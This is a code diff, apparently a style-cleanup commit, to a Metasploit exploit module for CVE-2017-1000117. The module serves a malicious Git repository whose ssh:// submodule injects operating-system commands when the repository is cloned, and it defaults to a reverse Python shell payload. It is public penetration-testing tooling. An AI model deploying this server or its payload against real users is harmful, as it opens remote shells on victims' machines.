@@ -9,60 +9,63 @@ class MetasploitModule < Msf::Exploit::Remote
99 include Msf ::Exploit ::Remote ::HttpServer
1010
1111 def initialize ( info = { } )
12- super ( update_info (
13- info ,
14- 'Name' => 'Malicious Git HTTP Server For CVE-2017-1000117' ,
15- 'Description' => %q(
16- This module exploits CVE-2017-1000117, which affects Git
17- version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed
18- parameters from the username incorrectly. This can be used to inject
19- commands to the operating system when the submodule is cloned.
20-
21- This module creates a fake git repository which contains a submodule
22- containing the vulnerability. The vulnerability is triggered when the
23- submodules are initialised.
24- ) ,
25- 'License' => MSF_LICENSE ,
26- 'References' =>
27- [
28- [ 'CVE' , '2017-1000117' ] ,
29- [ 'URL' , 'http://seclists.org/oss-sec/2017/q3/280' ]
30- ] ,
31- 'DisclosureDate' => 'Aug 10 2017' ,
32- 'Targets' =>
33- [
12+ super (
13+ update_info (
14+ info ,
15+ 'Name' => 'Malicious Git HTTP Server For CVE-2017-1000117' ,
16+ 'Description' => %q(
17+ This module exploits CVE-2017-1000117, which affects Git
18+ version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed
19+ parameters from the username incorrectly. This can be used to inject
20+ commands to the operating system when the submodule is cloned.
21+
22+ This module creates a fake git repository which contains a submodule
23+ containing the vulnerability. The vulnerability is triggered when the
24+ submodules are initialised.
25+ ) ,
26+ 'License' => MSF_LICENSE ,
27+ 'References' =>
3428 [
35- 'Automatic' ,
36- {
37- 'Platform' => [ 'unix' ] ,
38- 'Arch' => ARCH_CMD ,
39- 'Payload' =>
40- {
41- 'Compat' =>
42- {
43- 'PayloadType' => 'python' ,
44- }
45- }
46- }
29+ [ 'CVE' , '2017-1000117' ] ,
30+ [ 'URL' , 'http://seclists.org/oss-sec/2017/q3/280' ]
4731 ] ,
48- ] ,
49- 'DefaultOptions' =>
50- {
51- 'Payload' => 'cmd/unix/reverse_python'
52- } ,
53- 'DefaultTarget' => 0 ) )
32+ 'DisclosureDate' => 'Aug 10 2017' ,
33+ 'Targets' =>
34+ [
35+ [
36+ 'Automatic' ,
37+ {
38+ 'Platform' => [ 'unix' ] ,
39+ 'Arch' => ARCH_CMD ,
40+ 'Payload' =>
41+ {
42+ 'Compat' =>
43+ {
44+ 'PayloadType' => 'python'
45+ }
46+ }
47+ }
48+ ]
49+ ] ,
50+ 'DefaultOptions' =>
51+ {
52+ 'Payload' => 'cmd/unix/reverse_python'
53+ } ,
54+ 'DefaultTarget' => 0
55+ )
56+ )
5457
5558 register_options (
5659 [
5760 OptString . new ( 'GIT_URI' , [ false , 'The URI to use as the malicious Git instance (empty for random)' , '' ] ) ,
58- OptString . new ( 'GIT_SUBMODULE' , [ false , 'The path to use as the malicious git submodule (empty for random)' , '' ] ) ,
61+ OptString . new ( 'GIT_SUBMODULE' , [ false , 'The path to use as the malicious git submodule (empty for random)' , '' ] )
5962 ]
6063 )
6164 end
6265
6366 def setup
6467 @repo_data = {
65- git : { files : { } } ,
68+ git : { files : { } }
6669 }
6770 setup_git
6871 super
@@ -75,7 +78,7 @@ def setup_git
7578 end
7679
7780 payload_cmd = payload . encoded + " &"
78- payload_cmd = Rex ::Text . to_hex ( payload_cmd , prefix = '%' )
81+ payload_cmd = Rex ::Text . to_hex ( payload_cmd , '%' )
7982
8083 submodule_path = datastore [ 'GIT_SUBMODULE' ]
8184 if submodule_path . blank?
@@ -140,7 +143,8 @@ def primer
140143 def on_request_uri ( cli , req )
141144 # if the URI is one of our repositories and the user-agent is that of git/mercurial
142145 # send back the appropriate data, otherwise just show the HTML version
143- if ( user_agent = req . headers [ 'User-Agent' ] and user_agent =~ /^git\/ / && req . uri . start_with? ( git_uri ) )
146+ user_agent = req . headers [ 'User-Agent' ]
147+ if user_agent && user_agent =~ /^git\/ / && req . uri . start_with? ( git_uri )
144148 do_git ( cli , req )
145149 return
146150 end
@@ -193,5 +197,4 @@ def git_uri
193197 @git_uri = datastore [ 'GIT_URI' ]
194198 end
195199 end
196-
197200end
0 commit comments